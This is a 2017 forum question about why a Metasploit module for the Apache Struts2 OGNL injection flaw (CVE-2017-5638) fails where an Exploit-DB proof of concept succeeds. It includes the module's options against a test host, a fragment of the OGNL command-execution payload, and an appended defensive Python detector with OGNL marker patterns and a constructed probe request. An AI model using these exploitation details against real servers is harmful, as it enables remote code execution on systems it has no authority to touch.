
Apache Struts2 OGNL injection (CVE-2017-5638) module can't exploit.

Question asked by iwama yu on Apr 5, 2017

Hi, I am testing Apache Struts Jakarta Multipart Parser OGNL Injection (CVE-2017-5638, S02-045, S02-046) using the Metasploit module, but I cannot exploit.

 

# Setting options for module
=============================================================================
msf exploit(struts2_content_type_ognl) > show options
Module options (exploit/multi/http/struts2_content_type_ognl):


   Name           Current Setting                 Required  Description
   ----           ---------------                 --------  -----------
   DynamicStager  true                            no        Use Dynamic C-Stager if applicable (AV evasion)
   Proxies                                        no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOST          10.3.204.70                     yes       The target address
   RPORT          8080                            yes       The target port (TCP)
   SSL            false                           no        Negotiate SSL/TLS for outgoing connections
   TARGETURI      /struts2-showcase/index.action  yes       The path to a struts application action
   VHOST                                          no        HTTP server virtual host


Payload options (cmd/unix/generic):


   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------
   CMD   whoami           yes       The command string to execute
=============================================================================

 

So, I tested the same target site using the following PoC code (https://www.exploit-db.com/exploits/41570/) and confirmed that it can exploit it.

 

The PoC code can exploit the target, but the Metasploit module cannot exploit the same target site. Why?

I investigated the cause of the failure and found two points.

 

Firstly, I compared the Metasploit module source code with the PoC code, and I did not find the following lines in the Metasploit module.

(#p.redirectErrorStream(true)).(#process=#p.start()).
(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).
(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).
(#ros.flush())}

 

Secondly, the HTTP request that the Metasploit module sends contains two Content-Type headers.


What did I do wrong?
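A defender-side check related to the two observations in the question, added here as an example (it is not part of the question, of the PoC, or of the Metasploit module): it parses a raw HTTP request, counts Content-Type headers, and flags an OGNL expression marker in that header, which is the value the Jakarta Multipart parser ended up evaluating in CVE-2017-5638. The marker list and both sample requests are constructed assumptions for illustration, not captured traffic.

```python
import re
from typing import Dict, List, Tuple

# OGNL markers in a Content-Type value. In CVE-2017-5638 the Jakarta Multipart
# parser copied an invalid Content-Type into an error message that was then
# evaluated as OGNL, so "%{" here is the classic indicator. The list is an
# assumption made for this example, not a complete signature set.
OGNL_MARKERS = ("%{", "#_memberAccess", "@ognl.OgnlContext@")


def parse_request_headers(raw: str) -> List[Tuple[str, str]]:
    """Return (name, value) for every header line of a raw HTTP request,
    keeping duplicates and lowercasing names (header names are
    case-insensitive)."""
    head = re.split(r"\r?\n\r?\n", raw, maxsplit=1)[0]
    headers = []
    for line in re.split(r"\r?\n", head)[1:]:  # skip the request line
        if ":" not in line:
            continue
        name, value = line.split(":", 1)
        headers.append((name.strip().lower(), value.strip()))
    return headers


def assess_request(raw: str) -> Dict[str, object]:
    """Flag more than one Content-Type header, or an OGNL marker in any
    Content-Type value."""
    values = [v for n, v in parse_request_headers(raw) if n == "content-type"]
    findings = []
    if len(values) > 1:
        findings.append("duplicate Content-Type header")
    if any(m in v for v in values for m in OGNL_MARKERS):
        findings.append("OGNL expression in Content-Type")
    return {"content_type_count": len(values), "findings": findings}


# Constructed sample requests (not captured traffic).
BENIGN_REQUEST = (
    "POST /struts2-showcase/index.action HTTP/1.1\r\n"
    "Host: example.invalid\r\n"
    "Content-Type: multipart/form-data; boundary=abc123\r\n\r\n"
)
PROBE_REQUEST = (
    "POST /struts2-showcase/index.action HTTP/1.1\r\n"
    "Host: example.invalid\r\n"
    "Content-Type: multipart/form-data\r\n"
    "Content-Type: %{(#_='multipart/form-data').(#constructed_sample)}\r\n\r\n"
)
```

Running `assess_request` over access-layer captures or a WAF's raw-request log surfaces both the duplicate header and the OGNL marker, so either anomaly can be alerted on even when the other is absent.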
